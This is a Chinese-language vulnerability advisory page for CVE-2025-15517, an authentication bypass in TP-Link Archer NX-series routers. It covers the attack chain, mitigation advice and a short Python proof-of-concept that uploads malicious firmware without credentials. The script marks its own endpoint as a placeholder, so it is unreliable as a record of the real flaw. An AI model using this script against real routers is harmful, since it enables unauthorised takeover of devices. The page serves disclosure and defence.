CVE-2025-15517 CVSS 8.1 高危

CVE-2025-15517 TP-Link Archer认证缺失漏洞

披露日期: 2026-03-23

来源: f23511db-6c3e-4e32-a477-6aa17d310630

漏洞信息

漏洞编号

CVE-2025-15517

漏洞类型

权限绕过

CVSS评分

8.1 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

TP-Link Archer NX200, NX210, NX500, NX600

漏洞概述

TP-Link Archer NX200系列路由器存在认证缺失漏洞，攻击者无需身份验证即可通过特定CGI端点访问受限功能。该漏洞允许攻击者在本地网络中执行特权操作，包括上传恶意固件和修改配置，可能导致设备被完全控制。

技术细节

该漏洞的根本原因在于TP-Link Archer NX200、NX210、NX500及NX600系列路由器的Web服务器软件中，针对特定CGI（通用网关接口）端点的访问控制列表（ACL）配置不当或代码逻辑缺失。在正常的业务流程中，涉及系统关键配置修改或固件升级的接口应当严格验证用户的Session ID或Token。然而，受影响设备在处理这些请求时，并未执行必要的身份验证中间件检查。利用该漏洞的攻击者仅需处于与路由器相同的网络环境中（攻击向量AV:A），即可绕过登录界面，直接向后台管理接口发送构造好的HTTP数据包。由于系统未对请求来源进行身份校验，攻击者可以成功触发固件上传功能。一旦攻击者上传了经过篡改的固件，即可获得设备的最高控制权，进而植入后门、窃密或破坏网络稳定性，造成严重的安全后果。

攻击链分析

STEP 1

步骤1：网络接入

攻击者连接到目标路由器的局域网（LAN）或Wi-Fi网络，满足邻接攻击向量的要求。

STEP 2

步骤2：漏洞探测

攻击者向路由器发送HTTP请求，探测是否存在未授权访问的CGI端点。

STEP 3

步骤3：构造攻击请求

攻击者构造包含恶意固件文件的HTTP POST请求，目标指向存在漏洞的固件上传接口。

STEP 4

步骤4：执行未授权操作

路由器处理请求，由于未进行身份验证，直接执行固件上传操作，导致设备被植入恶意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: TP-Link Archer NX Series Auth Bypass (CVE-2025-15517)
# Description: Uploads a malicious firmware file without authentication.

# Target configuration
target_ip = "192.168.0.1"  # Replace with the router's IP address
endpoint = "/cgi-bin/upload_firmware"  # Vulnerable endpoint placeholder
url = f"http://{target_ip}{endpoint}"

# Prepare the malicious firmware file
files = {'firmware': ('malicious.bin', open('malicious.bin', 'rb'), 'application/octet-stream')}

try:
    # Send POST request without authentication headers
    print(f"[*] Sending exploit payload to {url}...")
    response = requests.post(url, files=files, timeout=10)

    # Check response
    if response.status_code == 200:
        print("[+] Exploit successful! Firmware uploaded.")
    else:
        print(f"[-] Exploit failed. Server returned: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

TP-Link Archer NX200

TP-Link Archer NX210

TP-Link Archer NX500

TP-Link Archer NX600

防御指南

临时缓解措施

在官方发布修复补丁前，建议用户严格限制Wi-Fi网络的访问权限，设置强密码并关闭WPS功能。同时，应密切关注路由器管理界面的异常行为，若发现设备性能下降或配置被篡改，应立即断网并恢复出厂设置。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表